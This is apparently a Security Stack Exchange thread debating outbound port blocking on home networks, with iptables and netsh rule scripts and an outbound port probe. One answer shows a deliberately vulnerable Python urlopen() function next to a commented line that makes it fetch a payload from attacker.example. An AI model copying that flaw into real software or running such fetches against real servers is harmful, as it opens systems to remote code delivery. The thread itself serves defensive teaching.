71

For a home network, is there any reason to set up the router firewall so that all outgoing ports are blocked, and then open specific ports for things such as HTTP, HTTPS, etc.? Given that every computer on the network is trusted, surely the extra security provided by blocking outgoing ports would be pretty much negligible?

Scott Pack
  • 15,217
  • 5
  • 62
  • 91
Alex McCloy
  • 813
  • 1
  • 7
  • 5
  • 16
    Could help prevent your computer from becoming part of a botnet if it is somehow compromised. – Chad Harrison Nov 21 '12 at 17:19
  • 4
    In my home network, I neglected to block outgoing ports. I quickly wised up when an exploit in the mail server was used to upload a bootstrap piece of malware, which was just a script that made an outgoing connection to download the rest of the malware. The attack could have been mitigated had the bootstrap piece not been able to phone home. – Kaz Nov 21 '12 at 22:06
  • 2
    I'd recommend ALSO blocking outgoing http, https, ssh, etc.: only open what you need AT A GIVEN TIME (on critical servers). For example: a server doesn't need to be able to reach the web (or its own updates) apart from the time of day when it is updating... So if it is attacked at another time, having outgoing http/https/ssh/whatever blocked will help reduce the attacker's ability to download a payload or use your network in some way. – Olivier Dulac Jun 11 '13 at 12:35
  • 8
    "Given that every computer on the network is trusted" -- This is a bad assumption. – u2702 Jul 08 '13 at 15:33

12 Answers

71

Blocking outbound traffic is usually of benefit in limiting what an attacker can do once they've compromised a system on your network.

So for example, if they've managed to get malware onto a system (via an infected e-mail or browser page), the malware might try to "call home" to a command and control system on the Internet to download additional code or to accept tasks from a control system (e.g. sending spam).

Blocking outbound traffic can help stop this from happening, so it's not so much about stopping you from getting infected as about limiting the damage once it has happened.

It could be overkill for a home network, though, as there are a lot of programs that make outbound connections and you'd need to spend a bit of time setting up all the exceptions.
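
For illustration, here's a minimal sketch of what a default-deny outbound policy with a handful of exceptions could look like. It assumes a Linux machine or gateway with iptables, run as root, and the allowed ports (DNS, HTTP, HTTPS) are just examples rather than a recommendation:

```python
import subprocess

def rule(args):
    """Apply one iptables rule, failing loudly if it can't be added."""
    subprocess.run(["iptables"] + args, check=True)

# Default-deny everything leaving the box, then punch specific holes.
rule(["-P", "OUTPUT", "DROP"])                                  # drop all outbound by default
rule(["-A", "OUTPUT", "-o", "lo", "-j", "ACCEPT"])              # loopback traffic is fine
rule(["-A", "OUTPUT", "-m", "conntrack", "--ctstate",
      "ESTABLISHED,RELATED", "-j", "ACCEPT"])                   # replies on already-allowed connections
for proto, port in [("udp", "53"), ("tcp", "53"),               # DNS
                    ("tcp", "80"), ("tcp", "443")]:             # HTTP / HTTPS
    rule(["-A", "OUTPUT", "-p", proto, "--dport", port, "-j", "ACCEPT"])
```

Every additional program that needs the network (VPN clients, game clients, update services) then needs its own exception, which is exactly the maintenance burden described above.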

Rory McCune
  • 61,541
  • 14
  • 140
  • 221
  • 1
    Something similar happens with a Windows PC's firewall, and it is easier to manage. Whenever a new program that needs outbound connections to the Internet is installed, an additional step must be taken to allow outbound connections for that application (Firefox, Thunderbird, etc.). This is more manageable than blocking everything centrally at the firewall. – dadinck Nov 21 '12 at 18:10
  • 2
    @dadinck, but if the Admin account is compromised, would it not be possible for the attacker/virus/Trojan to change the Windows Firewall settings to allow the connection to the Command&Control? – Lex Apr 20 '13 at 08:10
  • 12
    Wouldn't any attacker just contact their command and control network over port 80 or 443? – bhspencer Feb 25 '16 at 19:13
  • 6
    @bhspencer, Yes, this exact thing happens. A specific case of this that I have heard about is where a program on an infected machine uses http GET's to ping a specific web address and waits to execute commands based on innocuous submissions to that page. – Shadoninja Apr 26 '16 at 22:10
  • 6
    @bhspencer thinking the same thing. If that's the case, then the whole exercise is pointless I think. – Ardee Aram Nov 19 '16 at 04:27
  • 2
    In a typical Win10 environment, how likely is it that malware will be able to whitelist itself in the Windows Firewall, and then call home? – Doochz Dec 16 '16 at 07:36
  • 1
    Yes, it *is* pointless for that reason to limit egress from a network. Inside a network, limiting egress on individual machines can prevent rapid spread of some old worms - but it cannot keep malware from "calling home" and downloading payload code. – foo Jan 22 '20 at 20:03
31

Coming from a security role, particularly if you've ever been involved in incident response, the idea of outbound filtering seems a natural course in a high-security environment. However, it is a very large and complex undertaking. Mention the words "egress filtering" to a firewall, network, or systems administrator and you'll likely get a pained reaction.


So while we know that high-security environments may need this, and that it would warrant the extra work, it can sometimes be difficult to get buy-in, particularly when a unit whose primary duty is to maintain uptime is suddenly asked to take on a potentially significant amount of extra maintenance to accomplish something that has a high probability of reducing uptime.

In this case we would be remiss not to mention the compliance angle. Let's look at PCI-DSS v2.0 for a moment. Requirements section 1 discusses systems and network security. This requirement is relevant here:

1.3.5

Do not allow unauthorized outbound traffic from the cardholder data environment to the Internet.

As much as we all like to talk about how "compliance is a starting point", in the real world sometimes the only traction we can get is the goal of filling in that checkbox or passing that audit. Taking a look at compliance documents relevant to your field or service could be useful. While PCI-DSS is strictly an industry requirement, agreed to by contract, it is a fairly specific set of requirements that I have seen adopted as a standard to audit against in other places with less well-defined requirements.

Scott Pack
  • 15,217
  • 5
  • 62
  • 91
26

Unless you block all outgoing traffic other than a whitelist of legitimate websites you visit (and/or use a proxy that does whitelisting and security scanning), there's little additional security to be gained from blocking all ports except 80/443. Well, blocking port 25 might be good to keep your network from being used to send spam.

Many botnets already communicate over HTTP to connect to their command/control network since they know that other ports may be blocked (some even use DNS as their command/control protocol). So if you're going to let your network connect to any HTTP server, then you're not giving yourself much additional protection from joining a botnet, and you'll continually run into problems when you try to run things that use other ports like VPN, video conferencing, online gaming, websites on non-standard ports, FTP, etc. And you'd really need to regularly audit the logs to look for signs of infection.
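
If you do decide to filter egress anyway, a quick probe from inside the network shows which outbound ports actually make it out. A minimal Python sketch, where `probe.example.org` is a placeholder for a host you control that listens on the ports you care about (otherwise a closed port on the far end is indistinguishable from a block):

```python
import socket

def outbound_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if an outbound TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Placeholder host: point this at something you control that listens on these ports.
for port in (25, 80, 443, 1194, 6667):
    state = "reachable" if outbound_open("probe.example.org", port) else "blocked/unreachable"
    print(f"outbound tcp/{port}: {state}")
```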

Probably not worth the hassle on a home network. You're probably better off spending your time trying to prevent malware infection in the first place than mitigating damage once you've been infected.

Johnny
  • 1,418
  • 13
  • 19
  • 3
    `Well, blocking port 25 might be good to keep your network from being used to send spam.` What's stopping a malicious process from running a mail server on port 80? – Dean Meehan Mar 02 '17 at 10:59
  • 7
    The question is talking about blocking _outgoing_ ports... If there's a malicious mail server somewhere on the internet that's listening to port 80, it doesn't need my computer to connect to it to send spam, it can just send spam on its own. – Johnny Mar 02 '17 at 15:45
  • That is a *malicious server* already, then. But to keep your own house clean, you want to avoid your network being the one sending out the spam - to bona fide mail servers, which will be listening on ports tcp/25 (or 587, 465). – foo Dec 13 '22 at 15:56
13

Incoming traffic blocking can only prevent unsolicited traffic from reaching your internal network. However, if you get malware on an internal machine (via running an untrusted executable, or through an exploit) you can still be hit.

Blocking outgoing traffic helps limit the damage, by preventing the malware from connecting to a command & control server or exfiltrating data. Whilst your machine will still be compromised, it might save you from having your personal details stolen by a keylogger.

Polynomial
  • 133,763
  • 43
  • 302
  • 380
8

Two reasons:

  1. In the event that malware makes its way into your network, blocking outgoing traffic can sometimes contain the damage by preventing the malware from contacting a remote server. If you firewall at the machine level, you may also keep the malware from spreading further through your network. Disallowing outgoing traffic also means that your machine becomes less interesting as part of a botnet.
  2. Legitimate software with networking capabilities might be vulnerable and could be tricked into setting up outgoing connections which can then be used to further compromise your system. Consider, for example, a web server that runs an application with a flaw that allows an attacker to trick it into downloading files over the internet instead of opening local files (such a flaw is easy to produce and overlook in, for example, PHP). If you have it properly firewalled off, the request will simply fail, and maybe even trigger an alarm somewhere.
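
The PHP flaw alluded to in point 2 has straightforward analogues in other languages. Here's a hedged Python sketch of the same class of bug, with made-up paths purely for illustration; the point is that egress filtering turns "attacker makes my server download a payload" into a failed connection:

```python
import urllib.request

def load_page(resource: str) -> bytes:
    """VULNERABLE sketch: 'resource' comes straight from a request parameter.
    Because urlopen() understands http:// and ftp:// URLs as well as file://,
    an attacker who controls 'resource' can make the server fetch content
    from the Internet. With outbound traffic firewalled off, that fetch fails."""
    return urllib.request.urlopen(resource).read()

# Intended use:  load_page("file:///var/www/pages/about.html")
# Attack:        load_page("http://attacker.example/payload")  # dies at the firewall
```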
tdammers
  • 1,776
  • 9
  • 14
6

Blocking outgoing DNS queries so that DNS can only be routed through your preferred DNS server (enterprise DNS server, OpenDNS, Quad9, Google Public DNS, etc) is fairly commonplace on a network that has been somewhat secured.

US-CERT has an informative article about this, and lists the impacts of not doing so:

Unless managed by perimeter technical solutions, client systems and applications may connect to systems outside the enterprise’s administrative control for DNS resolution. Internal enterprise systems should only be permitted to initiate requests to and receive responses from approved enterprise DNS caching name servers. Permitting client systems and applications to connect directly to Internet DNS infrastructure introduces risks and inefficiencies to the organization, which include:

  • Bypassed enterprise monitoring and logging of DNS traffic; this type of monitoring is an important tool for detecting potential malicious network activity.
  • Bypassed enterprise DNS security filtering (sinkhole/redirect or blackhole/block) capabilities; this may allow clients to access malicious domains that would otherwise be blocked.
  • Client interaction with compromised or malicious DNS servers; this may cause inaccurate DNS responses for the domain requested (e.g., the client is sent to a phishing site or served malicious code).
  • Lost protections against DNS cache poisoning and denial-of-service attacks. The mitigating effects of a tiered or hierarchical (e.g., separate internal and external DNS servers, split DNS, etc.) DNS architecture used to prevent such attacks are lost.
  • Reduced Internet browsing speed since enterprise DNS caching would not be utilized.

https://www.us-cert.gov/ncas/alerts/TA15-240A
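
As a concrete sketch of the "clients may only talk DNS to the approved resolver" rule, here is one way it might look with iptables on a Linux host, run as root. 9.9.9.9 (Quad9) stands in for whichever approved resolver you actually use; on a gateway filtering a LAN the same rules would go in the FORWARD chain instead of OUTPUT:

```python
import subprocess

APPROVED_RESOLVER = "9.9.9.9"   # e.g. Quad9; substitute your enterprise or preferred DNS server

def rule(args):
    """Apply one iptables rule; requires root."""
    subprocess.run(["iptables"] + args, check=True)

for proto in ("udp", "tcp"):
    # Allow DNS only to the approved resolver...
    rule(["-A", "OUTPUT", "-p", proto, "--dport", "53",
          "-d", APPROVED_RESOLVER, "-j", "ACCEPT"])
    # ...and drop DNS to everything else, so clients (and malware) with a
    # hard-coded third-party resolver get no answers at all.
    rule(["-A", "OUTPUT", "-p", proto, "--dport", "53", "-j", "DROP"])
```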

5

Beyond damage-control after a compromise, you might also want to:

  • Control how (and whether) users and processes inside the network use the Internet

  • Monitor your inside processes to detect malware ("passive vulnerability scanning")

tylerl
  • 82,665
  • 26
  • 149
  • 230
3

" there's little additional security to be gained from blocking all ports except 80/443. "

unless you're running a proxy in order to disguise your IP. In that case, code from a website (or injected into a website) could phone home on a different port, bypassing your proxy (which will normally be configured only to reroute outgoing traffic on the ports your browser usually uses).

This is so simple that anybody using Tor should be aware of it, since it punches a hole right through the mask that Tor provides.

Solution: route ALL ports through the proxy (which Tor does not recommend due to the performance cost), or block all outgoing ports except those specifically routed through your proxy.

mr random
  • 31
  • 1
1

A better approach for a home network is a software "personal firewall" that runs on each PC and prompts the user if they would like to allow a program that is trying to make an outbound connection to do so.

While annoying at first, when it prompts you for everything as it figures out what should be allowed, this is easier to maintain in a home environment than a network firewall doing outbound blocking, which has no concept of the difference between Google Chrome making a web page request and LulzBot2000 (yes, I made that up) making a web request for malware payloads.
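
The built-in Windows firewall doesn't prompt for outbound connections the way a third-party personal firewall does, but you can approximate the same per-application allow list by hand. A rough sketch, assuming an elevated (administrator) prompt and a made-up program path; you would also need allow rules for DNS and core system services before flipping the default:

```python
import subprocess

def netsh(*args):
    """Run one 'netsh advfirewall' command; must be run from an elevated prompt."""
    subprocess.run(["netsh", "advfirewall", *args], check=True)

# Allow a specific program outbound (the path is a made-up example).
netsh("firewall", "add", "rule", "name=AllowMyBrowserOut", "dir=out",
      "action=allow", r"program=C:\Tools\mybrowser.exe", "enable=yes")

# Then flip the default outbound policy to block everything not explicitly allowed.
netsh("set", "allprofiles", "firewallpolicy", "blockinbound,blockoutbound")
```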

Rod MacPherson
  • 1,067
  • 7
  • 11
0

The world might be a better place if more home routers defaulted to blocking outgoing ports like SMTP, IRC, etc. And those are just off the top of my head.

I just landed here after turning off pretty much everything but ssh, http and https. It's a preventative measure, another layer of security, but in this case, it's preventing bad actors from using your network as a launching point for an attack.

That being said, I'm currently in the middle of debugging it. The Linux clients (my main Debian box, a Debian netbook, the internal name/file/print/time server running Debian, and the HestiaPi thermostat) are all working fine. The Android phone is whining that there's no Internet (because I also set up caching/filtering DNS and pointed all the clients at it, a la Pi-hole), but I can get to the things I use (pretty much web and SSH).

The Roku is another story; YouTube, Vimeo and even Netflix work fine, after (again) whining from the Roku that there's no Internet because I won't let it contact its precious ad servers (for the first time ever, the ads are gone from the main screen; I'll try to keep it that way). But Amazon and Hoopla both don't work, and given that I have to fire up a VPN on the work computer tomorrow, I will almost certainly be scaling back.

TL;DR - filtering outgoing is a good idea. At least close off outgoing connections to all the bad things you never use (telnet, R-commands, etc), and judiciously consider closing off others.

0

As others have mentioned above, blocking outgoing ports will limit what an attacker can do after your machine has already been infected. Let's take a look at the situation below:

  1. An attacker manages to compromise your machine with a RAT (remote administration tool).
  2. A RAT usually works by connecting back to the attacker's machine to communicate with it; normally it would be able to do so freely.
  3. Now assume you have all outgoing traffic blocked: the RAT can no longer communicate with the attacker's machine, which makes any information it has stolen from your PC essentially useless.

Just because you've stopped the RAT from communicating with the attacker's server doesn't mean you're safe.

The RAT can still modify your file system and slow your machine down, depending on what it's doing. It's also worth mentioning that if the RAT had sufficient privileges, it could change your firewall's rules and re-enable outgoing traffic, allowing it to communicate with the attacker's server.

Crisp Apples
  • 101
  • 1
0

One reason for blocking outbound connections is to set up a test environment. To build one, you'll likely need a managed switch, a physical firewall, a Raspberry Pi, and one or two laptops (preferably at least one running Linux). The reason you would block outbound traffic in a test environment is to prevent yourself from accidentally sending malicious traffic to an unknown IP address, which could land you in serious legal trouble.

schroeder
  • 125,553
  • 55
  • 289
  • 326